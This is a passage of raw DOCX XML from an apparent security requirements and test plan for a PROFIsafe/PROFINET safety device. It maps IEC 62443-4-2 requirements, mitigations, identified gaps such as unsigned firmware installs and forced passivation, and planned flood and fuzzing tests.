          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B95E32">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR </w:t>
      </w:r>
      <w:r w:rsidR="00491899">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5, CR 3.6, CR 3.7, </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 7.1 (1)</w:t>
      </w:r>
      <w:r w:rsidR="00491899">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2888CC" w14:textId="57373E72" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A (Trusted Safety Function, E Safety Monitoring)</w:t>
      </w:r>
      <w:r w:rsidR="00634688">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain Separation)</w:t>
      </w:r>
      <w:r w:rsidR="009D15C7" w:rsidRPr="009D15C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D15C7" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>), H (Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714CF73" w14:textId="3D952539" w:rsidR="00DB1578" w:rsidRPr="00DB1578" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="00DB1578">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denial of Service (primary); Tampering</w:t>
      </w:r>
      <w:r w:rsidR="005A4C32">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Spoofing, Elevation of Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A280199" w14:textId="77777777" w:rsidR="007062D6" w:rsidRPr="001A467C" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFFDBD6" w14:textId="55779432" w:rsidR="00FE4904" w:rsidRPr="00FE4904" w:rsidRDefault="00FE4904" w:rsidP="00FE4904">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>External HW watchdog + F_WD_Time → passivation (CR 3.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA17530" w14:textId="6EAFCF98" w:rsidR="00FE4904" w:rsidRPr="00FE4904" w:rsidRDefault="00FE4904" w:rsidP="00FE4904">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Black-channel principle</w:t>
      </w:r>
      <w:r w:rsidR="00223661">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> COM = QM; safety on SCPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319811D" w14:textId="01384D0B" w:rsidR="00FE4904" w:rsidRPr="00FE4904" w:rsidRDefault="00FE4904" w:rsidP="00FE4904">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dual SCPU cross-check + STL</w:t>
      </w:r>
      <w:r w:rsidR="00223661">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Random-fault detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B04BB" w14:textId="7346E195" w:rsidR="00FE4904" w:rsidRPr="00FE4904" w:rsidRDefault="00FE4904" w:rsidP="00FE4904">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROFINET Net Load Class III (SRIO-1916), CC-C (SRIO-1915), IRT non-disturbance, port deactivation</w:t>
      </w:r>
      <w:r w:rsidR="00223661">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conformant-load robustness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112BC9F9" w14:textId="69D78AE2" w:rsidR="001A467C" w:rsidRPr="007062D6" w:rsidRDefault="00FE4904" w:rsidP="00FE4904">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4904">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2-connection HTTP cap (SRIO-7909).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BF1F4" w14:textId="77777777" w:rsidR="00553BEB" w:rsidRPr="00553BEB" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419FCEC" w14:textId="154492F3" w:rsidR="008B1F58" w:rsidRPr="008B1F58" w:rsidRDefault="008B1F58" w:rsidP="008B1F58">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Net Load Class III certifies robustness to high CONFORMANT load, but there is no documented protection against MALFORMED frames or application-layer floods on the IoT/DCP path </w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E" w:rsidRPr="000F1E7E">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> verify by fuzzing/flood.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408CEF7" w14:textId="4BB8377F" w:rsidR="008B1F58" w:rsidRPr="008B1F58" w:rsidRDefault="008B1F58" w:rsidP="008B1F58">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even if every attack resolves safely to passivation, continuous forced passivation = continuous unavailability of the safety function </w:t>
      </w:r>
      <w:r w:rsidR="000F1E7E" w:rsidRPr="000F1E7E">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the device satisfies the FAIL-SAFE interpretation but may fail the AVAILABILITY interpretation of ‘withstand’ (a permanently safe-stated machine can itself be an operational hazard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398CAEB" w14:textId="051A5BE4" w:rsidR="000835AC" w:rsidRPr="002C28AB" w:rsidRDefault="008B1F58" w:rsidP="002C28AB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="00C94277">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1F58">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Almost all foreseeable attacks resolve to the safe state (black channel + watchdog + CR 3.6) EXCEPT the unsigned-firmware install (RQ-005 G-2 / TC-RQ005-03), which installs attacker-controlled safety firmware → can lead to a hazardous situation. RQ-010 is met for the communication/DoS/fuzzing classes but NOT for the firmware-integrity class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064299C8" w14:textId="77777777" w:rsidR="000835AC" w:rsidRDefault="000835AC" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFEC378" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B70D307" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033B7F31" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E2A6D0" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BF5A96" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5C677D" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B45BFF2" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F678C3" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="134FAAE9" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB4B658" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C5070C" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CC3289" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E85F62" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605D4D76" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D55B9BB" w14:textId="77777777" w:rsidR="002C28AB" w:rsidRDefault="002C28AB" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D665A4E" w14:textId="4EEA1C0A" w:rsidR="009C0A46" w:rsidRPr="000835AC" w:rsidRDefault="009C0A46" w:rsidP="000835AC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000835AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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14:paraId="20CDA22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055160" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510FB4A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62925058"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22212C78"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6DB3ABAB"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SVV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="007F5798" w14:paraId="1FC1B11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D37749" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A93E451" w14:textId="24729C87" w:rsidR="00B73A1A" w:rsidRPr="006409CD" w:rsidRDefault="009B399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409CD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Baseline resilience: nominal PROFIsafe exchange under rated Net Load Class III conditions; confirm stable OPERATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26AAC521" w14:textId="3ED2F9B4" w:rsidR="00B73A1A" w:rsidRPr="006409CD" w:rsidRDefault="00452AE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409CD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional baseline CR 7.1/7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="223E8BFA" w14:textId="77777777" w:rsidR="006409CD" w:rsidRPr="000E3E5E"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E3E5E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirements-based; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094C1E33" w14:textId="401FE26F" w:rsidR="00B73A1A" w:rsidRPr="000E3E5E"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E3E5E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PROFINET Net Load Class III</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00594454" w14:textId="77777777" w:rsidR="00AF4206" w:rsidRPr="000E3E5E" w:rsidRDefault="00AF4206" w:rsidP="00AF4206">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7B9F0CF9" w14:textId="13A77F6A" w:rsidR="00B73A1A" w:rsidRPr="000E3E5E"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E3E5E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D258C9" w14:paraId="2C536BA4"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4B347D2" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45DBB522" w14:textId="77777777" w:rsidR="00936B84"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36B84">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PROFINET/L2 flood (escalating rate); observe safe-comms vs safe-passivation vs undefined; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD73149" w14:textId="2DFC5F2B" w:rsidR="00B73A1A" w:rsidRPr="00512DF4"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36B84">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sustain to test repeated passivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A42175" w14:textId="016FAADE" w:rsidR="00B73A1A" w:rsidRPr="00512DF4" w:rsidRDefault="00E8168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2DF4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1/G-2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178B51E4" w14:textId="77777777" w:rsidR="00E81680" w:rsidRPr="00512DF4"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38A145B9" w14:textId="77777777" w:rsidR="00E81680" w:rsidRPr="00512DF4"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768A89DE" w14:textId="77777777" w:rsidR="00E81680" w:rsidRPr="00512DF4"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3DED2D2B" w14:textId="77777777" w:rsidR="0073544A" w:rsidRPr="00512DF4"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512DF4">
              <w:t xml:space="preserve">MITRE T0814; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DDBF278" w14:textId="29F1D7B6" w:rsidR="0073544A" w:rsidRPr="00512DF4"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512DF4">
              <w:t xml:space="preserve">NIST SP 800-115 §5.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD80D5F" w14:textId="5AE7134A" w:rsidR="00B73A1A" w:rsidRPr="00512DF4"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512DF4">
              <w:t>ifm CM-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A85DBF0" w14:textId="317A2EA9" w:rsidR="00B73A1A" w:rsidRPr="00512DF4"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2DF4">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D0764E" w14:paraId="3B3070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554A2C" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DC4918" w14:textId="77777777" w:rsidR="003F4CAF" w:rsidRPr="008D0F54"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8D0F54">
              <w:t>Protocol fuzzing :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01E85FBD" w14:textId="77777777" w:rsidR="003F4CAF" w:rsidRPr="008D0F54"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8D0F54">
              <w:t xml:space="preserve"> malformed PROFINET/DCP + PROFIsafe + HTTP; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0B3A6C" w14:textId="65762EA5" w:rsidR="00B73A1A" w:rsidRPr="008D0F54" w:rsidRDefault="00600E89"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D0F54">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>monitor crash/hang vs safe rejection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FCD232A" w14:textId="62066EB7" w:rsidR="00F345A8" w:rsidRPr="008D0F54" w:rsidRDefault="00F345A8" w:rsidP="003F4CA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D0F54">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Proves CR 3.5/3.7; </w:t>
            </w:r>
            <w:r w:rsidR="008D0F54" w:rsidRPr="008D0F54">
